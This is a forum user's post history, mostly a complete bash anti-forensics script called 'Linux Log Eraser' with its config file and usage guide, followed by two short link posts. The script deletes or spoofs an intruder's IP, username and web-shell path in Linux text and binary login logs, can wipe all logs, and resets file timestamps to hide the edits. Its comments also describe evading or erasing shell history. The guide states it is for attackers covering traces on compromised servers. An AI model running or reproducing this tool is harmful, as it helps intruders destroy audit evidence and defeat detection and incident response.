Everything posted by Fi8sVrs
-
LINUX LOG ERASER by b0nd

#! /bin/bash
# June 2011
clear

# A separate file to contain the absolute path for log files. Do edit that per your requirement
source log_files.sh

# Scroll to the end of code to see the program flow

# The following arrays would only store the names of the log files found on system
# Not making them read-only as they have to be edited later to add in the existing log file names
found_ascii_log_files=()
found_binary_log_files=()
rtr=""              # A global variable needed to get array back as a return value from "check_time_stamping" function
flag=0              # A global variable to determine whether the back door path has to be deleted or not
spoof_user="root"   # All the entries for the "user_name" spoofing would be replaced by string "root" in non-ASCII log files

# Default banner of the script
default_banner () {
cat << EOF
############################################################################
        Linux Machine Log-Eraser Script
        Ver 0.3 - Third Release

Greetz to:
 GGGGGG\
GG  __GG\
GG /  \__| aaaaaa\  rrrrrr\  aaaaaa\   gggggg\   eeeeee\
GG |GGGG\  \____aa\ rr  __rr\ \____aa\ gg  __gg\ ee  __ee\
GG |\_GG | aaaaaaa |rr |  \__|aaaaaaa |gg /  gg |eeeeeeee |
GG |  GG |aa  __aa |rr |     aa  __aa |gg |  gg |ee   ____|
\GGGGGG |\aaaaaaa |rr |     \aaaaaaa |\ggggggg |\eeeeeee\
 \______/  \_______|\__|      \_______| \____gg | \_______|
                                        gg\   gg |
                                        \gggggg |
                                         \______/

Usage: $0 [options]
        -h help
############################################################################
EOF
call_exit
}

# Help banner of the script. It depicts the usage of various options
help_banner () {
cat << EOF
 GGGGGG\
GG  __GG\
GG /  \__| aaaaaa\  rrrrrr\  aaaaaa\   gggggg\   eeeeee\
GG |GGGG\  \____aa\ rr  __rr\ \____aa\ gg  __gg\ ee  __ee\
GG |\_GG | aaaaaaa |rr |  \__|aaaaaaa |gg /  gg |eeeeeeee |
GG |  GG |aa  __aa |rr |     aa  __aa |gg |  gg |ee   ____|
\GGGGGG |\aaaaaaa |rr |     \aaaaaaa |\ggggggg |\eeeeeee\
 \______/  \_______|\__|      \_______| \____gg | \_______|
                                        gg\   gg |
                                        \gggggg |
                                         \______/

Usage
=====
$0 options

OPTIONS:
   -h help                  Show this message
   -i [ip_address]          Search for a particular ip_address in all log files and search for top 30 IP's logged in log files
   -d [ip_address]          Delete the ip_address from log files
   -s [spoof_ip_address]    Spoof the IP following -d with the one following -s wherever deletion is not possible
   -u [user_name]           The user name whose logs are to be erased/spoofed
   -w [web_shell_path]      The web back door (e.g. c99) shell absolute path you wish to erase from logs
   -f fuck logs files       To erase all log files completely, not recommended though
   -e "file extensions"     To find other backdoors planted on system
   -r [web_root_directory]  The web root directory to start searching backdoors from

Ex: $0 -h
    * To show this help message
Ex: $0 -i 192.168.1.7
    * To search 192.168.1.7 in all logs files. Basically finding which logs files have trace of it, and
    * In addition to that, search all log files (/var/log/*) and show Top 30 most logged IP's in log files.
    * They could be good choices for spoofing
Ex: $0 -d 192.168.1.7 -s 10.1.1.7 -u "cracker"
    * To delete lines containing 192.168.1.7 and|or user_name "cracker" from ASCII files, and
    * To spoof 192.168.1.7 in non-ASCII files by 10.1.1.7 and user_name "cracker" by "root"
Ex: $0 -d 192.168.1.7 -s 10.1.1.7 -u "cracker" -w "/var/www/xyz.com/uploads/c99.php"
    * To delete lines containing 192.168.1.7 and|or user_name "cracker" and|or web_shell_path from ASCII files, and
    * To spoof 192.168.1.7 in non-ASCII files by 10.1.1.7 and user_name "cracker" by "root"
Ex: $0 -f
    * To erase all log files listed in log_files.sh completely (not recommended)
Ex: $0 -e "php txt asp" -r /var/www
    * To search for probable web backdoors planted on system. Once found, it is recommended to verify the result
    * The current example searches for files having extensions php or txt or asp in /var/www and subdirectories
    * Extensions and web_root_directory are customizable

[!] Stick to the above OPTION combinations only, else the script might not work properly

Author
======
b0nd, b0nd.g4h@gmail.com and www.garage4hackers.com
EOF
call_exit
}

# Checking and storing the log files found on system
existing_log_files () {
    for i in ${ascii_log_files[@]}      # Accessing all the array entries declared at the top (log_files.sh)
    do
        if [ -f $i ]; then
            found_ascii_log_files[ $j ]=$i      # fetching the found log files to our empty array
            j=$[$j + 1]
        fi
    done

    for i in ${binary_log_files[@]}     # Accessing all the array entries declared at the top (log_files.sh)
    do
        if [ -f $i ]; then
            found_binary_log_files[ $j ]=$i     # fetching the found log files to our empty array
            j=$[$j + 1]
        fi
    done
}

# Basic Information which might help user customizing script for the first time
search_log_files () {
    echo -e "\n>>>>>>>>>>>>> Basic Information <<<<<<<<<<<< \n"
    echo -e "[*] Linux Kernel: `uname -a`"
    echo -e "\n[*] The various log files found on system (per our script log_files.sh database):"

    j=0
    # following is the call to function to determine the log files found on system
    existing_log_files

    echo -e -n "\n\t[*] ASCII Log Files\n"
    for i in ${found_ascii_log_files[@]}
    do
        echo -e "\t\t$i"
    done

    echo -e -n "\n\t[*] Binary Log Files\n"
    for i in ${found_binary_log_files[@]}
    do
        echo -e "\t\t$i"
    done

    # The following code is to find all the log files containing the IP fetched to parameter -i
    # e.g. this should be the IP which attacker is willing to find and erase/spoof in log files
    verify_ip $search_ip    # The value for search_ip is obtained from command line arguments (parameter -i)

    echo -e "\n[*] Searching for IP $search_ip in all non-zip log files (/var/log/*)"
    # The following won't check the zipped files.
    # It's affecting the atime value, and nothing has been coded to restamp the atime against this grep command
    if [[ "`grep -rlw $search_ip /var/log*`" == "" ]]
    then
        echo -e "\n\t[*] Cool! The IP $search_ip does not have trace in any log file"
    else
        echo -e "\n\t[*] The IP $search_ip has appeared in following log files:"
        grep -rlw $search_ip /var/log/* | awk ' { print "          " $1 } '
    fi

    # The following would check for gz files in /var/log directory. Hard bound to the .gz extension. Make it generic if needed
    have_zgrep=`which zgrep`
    # It's affecting the atime value, and nothing has been coded to restamp the atime against this zgrep command
    if [[ "$have_zgrep" == "" ]]
    then
        echo -e "\n[*] zgrep could not be found on system"
        echo -e "\n\t[*] Skipping searching zip files for IP matching. Take care yourself :)"
    else
        echo -e "\n[*] zgrep found on system, so checking zip files as well."
        if [[ "`zgrep -lw $search_ip /var/log/*.gz`" == "" ]]
        then
            echo -e "\n\t[*] Cool! The IP $search_ip does not have trace in any zip log file (/var/log/*)"
        else
            echo -e "\n\t[*] The IP $search_ip has appeared in following zip log files in /var/log directory:"
            echo -e "\n\t[*] The script in current form does not edit zip files. Take care of your (|) yourself"
            zgrep -lw $search_ip /var/log/*.gz | awk ' { print "          " $1 } '
        fi
    fi

    echo -e "\n\t[!] It is recommended to include the above found log files, if not already in the list, in the script (log_files.sh)"
    echo -e "\t[!] Edit the file log_files.sh per your requirements"

    # Finding the IP's listed in all log files. The most common IP's could be a good choice for spoofing your original IP
    # Display Top 20 IP's to make choice from
    echo -e "\n[*] Displaying top 20 IP addresses found in log files"
    echo -e "\n\t[*] It is recommended to choose any suitable one among them to spoof your IP"

    touch tmp-counter.txt
    local ip_counter=0
    echo -e -n "\n\tPlease wait "

    # It's affecting the atime value, and nothing has been coded to restamp the atime against this grep command
    # The following grep command would find all the IP look-alikes present in all the log files in /var/log/*.
    # The sort will finally give the unique ones
    for i in $(grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' /var/log/* | grep -i ":" | cut -d ":" -f2 | sort -u)
    do
        # The following grep command is same as above but missing the trailing sort -u, hence all the multiple occurrences would be listed.
        # This would help in finding out the occurrence of each IP in log files i.e., take one IP from the unique list and compare it with
        # all the IP's in unsorted list, whenever there is a match, that would indicate re-occurrence and hence the ip_counter would increase by 1
        for j in $(grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' /var/log/* | grep -i ":" | cut -d ":" -f2)
        do
            if [[ $i == $j ]]
            then
                ip_counter=$[$ip_counter + 1]
            fi
        done
        echo -e -n "."
        echo "$ip_counter number of times $i has occurred in log files" >> tmp-counter.txt
        ip_counter=0
    done

    echo -e "\n\n\t[*] TOP 20 IP (look-alikes) found in log files:\n"
    cat tmp-counter.txt | sort -g -r | head -n 20 | awk ' { print "          " $1 " times -----> " $5 } '
    rm tmp-counter.txt
    call_exit
}

call_exit () {
    echo -e "\n[*] Exiting.....\n"
    #cat << EOF
    echo -e "\n\t\tWould you mind removing script execution traces from history?"
    echo -e "\t\t============================================================="
    echo -e " ==> http://www.garage4hackers.com/showthread.php?1032-Linux-HISTORY-How-to-avoid-getting-logged\n"
    # 1. Do not get logged; use the space technique.
    #    # echo \$HISTCONTROL
    #    if the output is not "ignorespace" (without quotes); do
    #    # export HISTCONTROL=ignorespace
    #    Now just give a space in front of any command and it would not be logged in history
    # 2. Another way of not getting logged:
    #    # history -d \$((HISTCMD-1)) && type_your_command_here_and_execute
    #    e.g
    #    # history -d \$((HISTCMD-1)) && whoami
    # 3. If the script has already been executed without taking precautions, either of the following can be done
    #    to remove the traces:
    #    a) # history -d \$((HISTCMD-2)) && history -d \$((HISTCMD-1))
    #       The above command would remove the last entry from history.
    #       Executing it a couple of times would delete a couple of entries
    #       # history
    #       Note down the command number and then execute:
    #       # history -d offset
    #       It would delete the respective entry from history
    #    c) To delete a group of consecutive commands
    #       Let us assume there are 50 commands in history and you wish to delete commands from 30 to 50
    #       # for i in {51..30}; do history -d "\$i"; done;
    #EOF
    exit
}

fuck_log_files () {
    # following is the call to function to determine the log files found on system
    existing_log_files

    echo "FTW! Erasing all log files"
    for i in ${found_ascii_log_files[@]}
    do
        echo -e "\t[*] Erasing $i..."
        > $i
    done

    for i in ${found_binary_log_files[@]}
    do
        echo -e "\t[*] Erasing $i..."
        > $i
    done
    echo "Done!"
    call_exit
}

verify_ip () {
    # First check is to verify that the chars entered as IP are integers
    # Second check has been made to confirm that only 3 dots are there in IP address
    # Third check is to mark the valid IP range. The octet value can not be < 0 or > 255

    str="$1"            # $1 is the first function parameter i.e. IP address here
    cnt=${#str}         # Counting the length of string fetched i.e total chars in IP address, including dots
    dot_counter=0

    for ((i=0; i < cnt; i++))
    do
        char=${str:$i:1}    # Reading one character at a time from the input string. Taken from http://www.unix.com/unix-dummies-questions-answers/80215-access-each-character-string.html
        #code=`printf %s "$char" | od -An -vtu1 | sed 's/^[^1-9]*//'`    # copied from http://unix.derkeiler.com/Newsgroups/comp.unix.shell/2004-08/0195.html
        code=`printf '%d' "'$char"`     # Echo the ASCII value of character

        # The first check
        if [ $code -lt 48 ] || [ $code -gt 57 ]     # Comparing the ASCII value range of Integers ( 48 - 57 )
        then
            if [ $code -ne 46 ]     # To check the "." value
            then
                echo -e "\n[*] Err!!! Not a valid IP (some non-integer characters), try again.....\n"
                call_exit
            else
                dot_counter=$[$dot_counter + 1]
            fi
        fi
    done

    # The second check
    if [ $dot_counter -ne 3 ]
    then
        echo -e "\n[*] Err!!! Not a valid IP (check the number of dots in IP Address), try again.....\n"
        call_exit
    fi

    # The third check
    # Extract the octets
    octet_a=`echo $1 | cut -d "." -f1`
    octet_b=`echo $1 | cut -d "." -f2`
    octet_c=`echo $1 | cut -d "." -f3`
    octet_d=`echo $1 | cut -d "." -f4`

    if [ \( $octet_a -lt 0 -o $octet_a -gt 255 \) -o \( $octet_b -lt 0 -o $octet_b -gt 255 \) -o \( $octet_c -lt 0 -o $octet_c -gt 255 \) -o \( $octet_d -lt 0 -o $octet_d -gt 255 \) ]
    then
        echo -e "\n[*] Err!!! Not a valid IP (octet value >=0 and <=255), try again.....\n"
        call_exit
    fi
}

# A function to verify whether the user name fetched to script exists or not
# The script will not delete any log line based on user-name "root", else most of the logs would get deleted
verify_user_name () {
    local user_name="$1"    # $1 is the first function parameter i.e. user-name here

    if [ $user_name != "root" ]
    then
        if [[ `cat /etc/passwd | cut -d ":" -f1 | grep $user_name` != $user_name ]]
        then
            echo -e "\t[*] User name does not exist"
            echo -e "\t[*] Instead of exiting, script will proceed considering you wish to delete logs of some old account which does not exist anymore"
        else
            echo -e "\t[*] user_name ($user_name) verified!"
        fi
    else
        echo -e "\t[*] User name is 'root'. Script will still take care not to delete lines based on this user name"
        echo -e "\t[*] user_name ($user_name) verified!"
    fi
}

# A function to obtain the original time stamping of the log file before editing the file
check_time_stamping () {
    echo -e "======================================================================"
    filename=$1
    echo -e "\n[*] Log File Under RADAR: $filename"

    local atime=`stat -c "%x~%y~%z" $(unknown) | cut -d "~" -f1 | cut -d "." -f1 | sed 's/-/ /g' | sed 's/:/ /g' | awk 'BEGIN {FS=" "} {print $1$2$3$4$5"."$6}'`
    local mtime=`stat -c "%x~%y~%z" $(unknown) | cut -d "~" -f2 | cut -d "." -f1 | sed 's/-/ /g' | sed 's/:/ /g' | awk 'BEGIN {FS=" "} {print $1$2$3$4$5"."$6}'`

    local array=()
    array=($atime $mtime)
    rtr=(${array[@]})   # rtr is a global variable
}

# The function to edit the log files and restore the Time (time stamping)
edit_ascii_file_and_timestamping () {
    for log_file in ${found_ascii_log_files[@]}     # It's a global array and declared at the top of code
    do
        # Calling check_time_stamping function to get the original time stamps before touching the files
        echo "inside for loop"
        check_time_stamping $log_file
        out=(${rtr[@]})
        atime=${out[0]}
        mtime=${out[1]}

        echo -e "\n[*] Time Stamping before editing the log file"
        echo -e "\tatime: $atime"
        echo -e "\tmtime: $mtime"

        # Edit only that file which has the desired string/IP in it. Don't touch others unnecessarily.
        # The following if and grep stuff does the same. If found IP in file then edit else don't. Err! haven't followed strictly
        # -w is needed else if you intend to delete 192.168.1.1, it would delete all 192.168.1.1* as well
        if grep -qsw "$1" "$log_file"   # $1 is the parameter passed to this function, IP in this case
        then
            echo -e "\n[*] The IP $1 found in $log_file ... so proceeding editing it"
            echo "Sleeping for 5 sec"
            echo -e "\n[*] Editing log file --> $log_file"
            sleep 5
            sed "/$1/d" $log_file > $log_file.new
            mv $log_file.new $log_file
        fi

        if [ $2 != 'root' ]     # $2 is the 2nd parameter passed to this function, User name in this case
        then
            if grep -qsw "$2" "$log_file"   # If user name fetched to script found in log file and that is not 'root'
            then
                echo -e "\n\n[*] The username $2 found in $log_file ... so proceeding editing it"
                echo "Sleeping for 5 sec"
                echo -e "\n[*] Editing log file --> $log_file"
                sleep 5
                sed "/$2/d" $log_file > $log_file.new
                mv $log_file.new $log_file
            fi
        fi

        if [ $flag -eq 1 ]      # flag=1 states that a web shell path too has to be removed from log files
        then
            echo -e "\nflag = 1, Deleting Backdoor Shell PATH: $3"
            sed -e "s@$3@@g" $log_file > $log_file.new
            mv $log_file.new $log_file
        fi

        # The following time stamping is necessary irrespective of whether the IP was found in file or not.
        # Because at least the file has been accessed while grep(ing) to search the content
        # So the atime has to be restored
        # Restoring mtime as well though with more code it can be skipped if value is not found in log file
        aatime=`stat -c "%x~%y~%z" ${log_file} | cut -d "~" -f1 | cut -d "." -f1 | sed 's/-/ /g' | sed 's/:/ /g' | awk 'BEGIN {FS=" "} {print $1$2$3$4$5"."$6}'`
        amtime=`stat -c "%x~%y~%z" ${log_file} | cut -d "~" -f2 | cut -d "." -f1 | sed 's/-/ /g' | sed 's/:/ /g' | awk 'BEGIN {FS=" "} {print $1$2$3$4$5"."$6}'`
        # actime=`stat -c "%x~%y~%z" ${log_file} | cut -d "~" -f3 | cut -d "." -f1 | sed 's/-/ /g' | sed 's/:/ /g' | awk 'BEGIN {FS=" "} {print $1$2$3$4$5"."$6}'`

        echo -e "\n[*] Time Stamping after editing the log file"
        echo -e "\tatime: $aatime"
        echo -e "\tmtime: $amtime"
        # echo "ctime: $actime"

        echo -e "\n[*] Restoring the time stamp........."
        touch -at $atime $log_file
        touch -mt $mtime $log_file
        #touch -ct $ctime $log_file

        aaatime=`stat -c "%x~%y~%z" ${log_file} | cut -d "~" -f1 | cut -d "." -f1 | sed 's/-/ /g' | sed 's/:/ /g' | awk 'BEGIN {FS=" "} {print $1$2$3$4$5"."$6}'`
        aamtime=`stat -c "%x~%y~%z" ${log_file} | cut -d "~" -f2 | cut -d "." -f1 | sed 's/-/ /g' | sed 's/:/ /g' | awk 'BEGIN {FS=" "} {print $1$2$3$4$5"."$6}'`
        # aactime=`stat -c "%x~%y~%z" ${log_file} | cut -d "~" -f3 | cut -d "." -f1 | sed 's/-/ /g' | sed 's/:/ /g' | awk 'BEGIN {FS=" "} {print $1$2$3$4$5"."$6}'`

        echo -e "\n[*] Time Stamping after restoring the time stamp"
        echo -e "\tatime: $aaatime"
        echo -e "\tmtime: $aamtime"
        # echo "ctime: $aactime"
        echo -e "\n======================================================================\n\n"
    done
}

edit_binary_file_and_timestamping () {
    for log_file in ${found_binary_log_files[@]}    # It's a global array and declared at the top of code
    do
        # Calling check_time_stamping function to get the original time stamps before touching the files
        check_time_stamping $log_file
        out=(${rtr[@]})
        atime=${out[0]}
        mtime=${out[1]}
        # ctime=${out[2]}

        echo -e "\n[*] Time Stamping before editing the log file"
        echo -e "\tatime: $atime"
        echo -e "\tmtime: $mtime"

        echo -e "\nSpoofing IP $1 in binary log file with IP $2"
        echo "Sleeping for 5 sec"
        sleep 5
        sed "s/$1/$2/g" $log_file > $log_file.new
        mv $log_file.new $log_file

        if [ $3 != 'root' ]
        then
            echo -e "\nSpoofing user name..."
            echo "Sleeping for 5 sec"
            sleep 5
            sed "s/$3/$spoof_user/g" $log_file > $log_file.new    # Edit the global variable spoof_user at the top
            mv $log_file.new $log_file
        fi

        # The following time stamping is necessary irrespective of whether the IP was found in file or not.
        # Because at least the file has been accessed while grep(ing) to search the content
        # So the atime has to be restored
        # Restoring mtime as well though with more code it can be skipped if value is not found in log file
        aatime=`stat -c "%x~%y~%z" ${log_file} | cut -d "~" -f1 | cut -d "." -f1 | sed 's/-/ /g' | sed 's/:/ /g' | awk 'BEGIN {FS=" "} {print $1$2$3$4$5"."$6}'`
        amtime=`stat -c "%x~%y~%z" ${log_file} | cut -d "~" -f2 | cut -d "." -f1 | sed 's/-/ /g' | sed 's/:/ /g' | awk 'BEGIN {FS=" "} {print $1$2$3$4$5"."$6}'`

        echo -e "\n\nTime Stamping after editing the log file"
        echo "atime: $aatime"
        echo "mtime: $amtime"

        echo -e "\nRestoring the time stamp........."
        touch -at $atime $log_file
        touch -mt $mtime $log_file

        aaatime=`stat -c "%x~%y~%z" ${log_file} | cut -d "~" -f1 | cut -d "." -f1 | sed 's/-/ /g' | sed 's/:/ /g' | awk 'BEGIN {FS=" "} {print $1$2$3$4$5"."$6}'`
        aamtime=`stat -c "%x~%y~%z" ${log_file} | cut -d "~" -f2 | cut -d "." -f1 | sed 's/-/ /g' | sed 's/:/ /g' | awk 'BEGIN {FS=" "} {print $1$2$3$4$5"."$6}'`

        echo -e "\nTime Stamping after restoring the time stamp"
        echo "atime: $aaatime"
        echo "mtime: $aamtime"
        echo -e "\n======================================================================\n\n"
    done
}

verify_IPs_and_user_name () {
    echo "[*] Verifying ip_address $ip_to_be_deleted ..."
    verify_ip $ip_to_be_deleted     # Passing the fetched IP as argument to verify_ip function
    echo -e "\t[*] ip_address ($ip_to_be_deleted) verified!\n"

    echo -e "\n[*] Verifying spoof_ip_address $spoof_ip ..."
    verify_ip $spoof_ip             # Passing the fetched IP as argument to verify_ip function
    echo -e "\t[*] spoof_ip_address ($spoof_ip) verified!\n"

    echo -e "\n[*] Verifying user_name: '$user_name' ..."
    verify_user_name $user_name
}

search_web_backdoor_shells () {
    for extension in ${extension_type[@]}   # Now the array already holds the various backdoor extensions fetched
    do
        echo -e "\n\t[*] Checking for Extension: $extension"
        sleep 1
        # The following would find and display + outputs the result to a text file
        grep -RPl --include=*.$extension "(passthru|shell_exec|system|phpinfo|base64_decode|chmod|mkdir|fopen|fclose|readfile) *\(" $web_root_directory | tee -a output.txt | awk ' { print "          " $1 } '
    done
    echo -e "\n\t[!] Done! The output has been stored in output.txt in append mode. Do not forget to delete it.\n"
    call_exit
}

lets_begin_the_show () {
    # Check: If "-e" and "-r", then just find the back door shells and exit
    if [[ -n $web_root_directory ]]
    then
        search_web_backdoor_shells

    # Check: If non "-e"|"-r" then proceed with deleting logs etc.
    elif [[ -n $ip_to_be_deleted ]]
    then
        verify_IPs_and_user_name

        if [[ -z $web_shell_path ]]
        then
            # Call the function with 2 values; no web shell path has been fetched. No spoofing, just delete the lines.
            edit_ascii_file_and_timestamping $ip_to_be_deleted $user_name
        else
            # Call the function with 3 values; delete web shell path as well. No spoofing, just delete the lines.
            flag=1
            edit_ascii_file_and_timestamping $ip_to_be_deleted $user_name $web_shell_path
        fi

        # Call the function to spoof the original IP and user name. No deletion, just spoofing (they being binary files).
        edit_binary_file_and_timestamping $ip_to_be_deleted $spoof_ip $user_name
    else
        echo -e "\nSome issue which I could not catch"
        call_exit
    fi
}

verify_combination_of_command_line_arguments () {
    # Check 1: None of the arguments has been passed
    if [[ -z $ip_to_be_deleted ]] && [[ -z $spoof_ip ]] && [[ -z $user_name ]] && [[ -z $extension_type ]] && [[ -z $web_root_directory ]]
    then
        echo -e "\n[*] Error! None of the required arguments has been passed"
        default_banner
        call_exit
    fi

    # Check 2: Nothing should be passed in combination with "-e" and "-r"
    if ( [[ -n $extension_type ]] || [[ -n $web_root_directory ]] ) && ( [[ -n $web_shell_path ]] || [[ -n $ip_to_be_deleted ]] || [[ -n $spoof_ip ]] || [[ -n $user_name ]] || [[ -n $web_shell_path ]] )
    then
        echo -e "\n[*] Error! Improper number of arguments passed"
        echo -e "\n[-] Do not mix -e and -r with any other flag!"
        default_banner
        call_exit
    fi

    # Check 3: "-e" and "-r" shall be together
    if ( [[ -n $extension_type ]] && [[ -z $web_root_directory ]] ) || ( [[ -z $extension_type ]] && [[ -n $web_root_directory ]] )
    then
        echo -e "\n[*] Error! Improper number of arguments passed"
        echo -e "\n[*] -e and -r must be specified together and must be non-empty!"
        default_banner
        call_exit
    fi

    # Check 4: If one of the following, the first one, is stated then rest must be
    if [[ -n $ip_to_be_deleted ]] && ( [[ -z $spoof_ip ]] || [[ -z $user_name ]] )
    then
        echo -e "\n[*] Error! Improper number of arguments passed"
        echo -e "\n[-] Include -s and -u when -d specified!"
        default_banner
        call_exit
    fi

    # Check 5: If one of the following, the first one, is stated then rest must be
    if [[ -n $spoof_ip ]] && ( [[ -z $ip_to_be_deleted ]] || [[ -z $user_name ]] )
    then
        echo -e "\n[*] Error! Improper number of arguments passed"
        echo -e "\n[-] Include -d and -u when -s specified!"
        default_banner
        call_exit
    fi

    # Check 6: If one of the following, the first one, is stated then rest must be
    if [[ -n $user_name ]] && ( [[ -z $ip_to_be_deleted ]] || [[ -z $spoof_ip ]] )
    then
        echo -e "\n[*] Error! Improper number of arguments passed"
        echo -e "\n[-] Include -d and -s when -u specified!"
        default_banner
        call_exit
    fi

    # Check 7: If first one is stated, then rest must be
    if [[ -n $web_shell_path ]] && ( [[ -z $ip_to_be_deleted ]] || [[ -z $spoof_ip ]] || [[ -z $user_name ]] )
    then
        echo -e "\n[*] Error! Improper number of arguments passed"
        echo -e "\n[-] Include -d, -s and -u when -w specified!"
        default_banner
        call_exit
    fi
}

# ---------------------------------------- The program execution starts from here -------------------------------

#### Checking UID and EUID value ####
#### Only allow root to execute this script as non-root might not have write access to log files
if [ "$UID" != "0" ]
then
    if [ "$EUID" != "0" ]
    then
        echo -e "\n[*] Cannot run script: Permission denied." "Please be root to use this script".
        call_exit
    fi
fi

#### Show default_banner if no argument has been passed
if [ $# -eq 0 ]
then
    default_banner
fi

# Following variables are for the command line arguments
search_ip=
ip_to_be_deleted=
spoof_ip=
user_name=
web_shell_path=
extension=              # This one to handle the multiple extensions given to grep from command prompt
web_root_directory=
extension_type=()       # This array will hold the multiple extensions
j=0

while getopts ":hi:fd:s:u:w:e:r:" option
do
    case $option in
        h)
            help_banner
            ;;
        i)
            search_ip=$OPTARG
            search_log_files
            ;;
        f)
            fuck_log_files
            ;;
        d)
            ip_to_be_deleted=$OPTARG    # All the verifications would be done later once combination of command line arguments have been verified
            ;;
        s)
            spoof_ip=$OPTARG            # Same as above
            ;;
        u)
            user_name=$OPTARG           # Same as above
            ;;
        w)
            web_shell_path=$OPTARG
            echo "WEB-SHELL-PATH: $web_shell_path"  # No verification could be done for it
            ;;
        e)
            for extension in $OPTARG
            do
                extension_type[ $j ]=$extension     # Holding multiple extensions passed at command line
                j=$[$j + 1]
            done
            ;;
        r)
            web_root_directory=$OPTARG
            echo -e "\t[*] Web-Root Directory: $web_root_directory"
            ;;
        ?)
            echo -e "\n[*] Wrong argument passed"
            default_banner
            ;;
    esac
done

# Call to following function to verify the combination of command line arguments passed to script
verify_combination_of_command_line_arguments

# Following function call is necessary in order to find the available log files on system
existing_log_files

# Following function call would be made only after all the mandatory arguments have been passed to the script
lets_begin_the_show


Log File:

#######################
# Declaration of two arrays containing the absolute path of log files. Add in more paths per your requirements
# Since declared outside any function, they are global
# declare -r makes our array read-only and it could not be altered anywhere in the code following the declaration
#######################

# Those log files which keep entries for IP address, web path accessed etc. Basically the ASCII log files.
declare -r ascii_log_files=(
    #'/var/log/syslog'
    #'/var/log/messages'
    #'/var/log/httpd/access_log'
    #'/var/log/httpd/error_log'
    #'/var/log/xferlog'
    #'/var/log/secure'
    #'/var/log/auth.log'
    #'/var/log/user.log'
    # Check syslog.conf for more log files
    # Enter more log files here
)

# Those log files which keep user activity logs. Basically the non-ASCII log files.
declare -r binary_log_files=(
    #'/var/log/wtmp'
    #'/var/log/lastlog'
    #'/var/log/btmp'
    #'/var/run/utmp'
    # Enter more log files here
)


Usage:

Linux Log Eraser
================

Linux Log Eraser is a bash script which erases almost all your logs from the log files on a Linux machine.
This can be useful for an attacker to wipe out the traces before logging out of the compromised Linux machine.

Usage
=====
$0 options

OPTIONS:
   -h help                  Show this message
   -i [ip_address]          Search for a particular ip_address in all log files and search for top 30 IP's logged in log files
   -d [ip_address]          Delete the ip_address from log files
   -s [spoof_ip_address]    Spoof the IP following -d with the one following -s wherever deletion is not possible
   -u [user_name]           The user name whose logs are to be erased/spoofed
   -w [web_shell_path]      The web back door (e.g. c99) shell absolute path you wish to erase from logs
   -f fuck logs files       To erase all log files completely, not recommended though
   -e "file extensions"     To find other backdoors planted on system
   -r [web_root_directory]  The web root directory to start searching backdoors from

Ex: $0 -h
    * To show this help message
Ex: $0 -i 192.168.1.7
    * To search 192.168.1.7 in all logs files. Basically finding which logs files have trace of it, and
    * In addition to that, search all log files (/var/log/*) and show Top 20 most logged IP's in log files.
    * They could be good choices for spoofing
Ex: $0 -d 192.168.1.7 -s 10.1.1.7 -u "cracker"
    * To delete lines containing 192.168.1.7 and|or user_name "cracker" from ASCII files, and
    * To spoof 192.168.1.7 in non-ASCII files by 10.1.1.7 and user_name "cracker" by "root"
Ex: $0 -d 192.168.1.7 -s 10.1.1.7 -u "cracker" -w "/var/www/xyz.com/uploads/c99.php"
    * To delete lines containing 192.168.1.7 and|or user_name "cracker" and|or web_shell_path from ASCII files, and
    * To spoof 192.168.1.7 in non-ASCII files by 10.1.1.7 and user_name "cracker" by "root"
Ex: $0 -f
    * To erase all log files listed in log_files.sh completely (not recommended)
Ex: $0 -e "php txt asp" -r /var/www
    * To search for probable web backdoors planted on system. Once found, it is recommended to verify the result
    * The current example searches for files having extensions php or txt or asp in /var/www and subdirectories
    * Extensions and web_root_directory are customizable

[!] Stick to the above OPTION combinations only, else the script might not work properly

Author
======
b0nd, b0nd.g4h@gmail.com and www.garage4hackers.com

Customizing the script while executing for the first time on target:
====================================================================
1. Upload both, the linux_log_eraser.sh and log_files.sh on target server
2. Fire the linux_log_eraser script. Take care that you must be root (either UID=0 or EUID=0) to execute the script
3. Use parameter -i, and pass the IP address you are worried about in log files: ./linux_log_eraser -i 192.168.1.1
4. The above command will scan all the log files for that particular IP and will let you know all the log files having trace of that IP
5. Open up log_files.sh file. Cross check which log file, reported in step 4, is not in the list. Do add the log file/files
6. Running the step 3 command would also let you know the top 20 IP's in the log files having most occurrences
7. Choose any suitable IP from the top 20 IP's as a spoof IP.....and you are ready to proceed with other options of script

Logic:
======
Some log files are ASCII types, hence can be read and edited easily. The rest of the log files are binary types and are hard to read and edit directly.

For ASCII files, all the lines in various log files containing either of the following would be deleted:
1. The IP following -d parameter
2. User name following -u parameter (if it is other than root). Since the user 'root' has many entries, so to remain stealthy it's better not to delete such lines.
3. Web shell path of your backdoor following -w parameter.

For binary files, all the entries for your IP and user name (if it is other than root) would be spoofed (not deleted)
IP would be spoofed to the Spoof IP provided and user name would be spoofed to "root"

Pass the following to script:
1. The IP which you wish to delete/spoof in log files
2. The spoof IP. This would be the IP to replace the IP in binary log files
3. The user name you wish to delete/spoof in log files
4. Absolute web shell path to erase its entries from log files (e.g. the web back doors)

For spoofing in binary files, better analyze the files manually first and choose a good IP and user name
You can do the following for binary file analysis:

For wtmp:
    #last                       (shows: username, terminal, IP)
    #strings /var/log/wtmp      (shows: username, terminal, IP)
For utmp:
    #who                        (shows: username, terminal, IP)
    #strings /var/run/utmp      (shows: username, terminal, IP)
For lastlog:
    #lastlog                    (shows: username, terminal, IP)
    #strings /var/log/lastlog   (shows: terminal, IP)
For btmp (if exists):
    #lastb                      (shows: username)
    #strings /var/log/btmp      (shows: username)

Correct me if the logic is wrong at any place except for "/var/log/lastlog"
-
Chromium Blog: Show off your security skills: announcing Pwnium 4 targeting Chrome OS
-
read this https://rstforums.com/forum/67118-sfaturi-raport-de-vulnerabilitate.rst#post433560
-
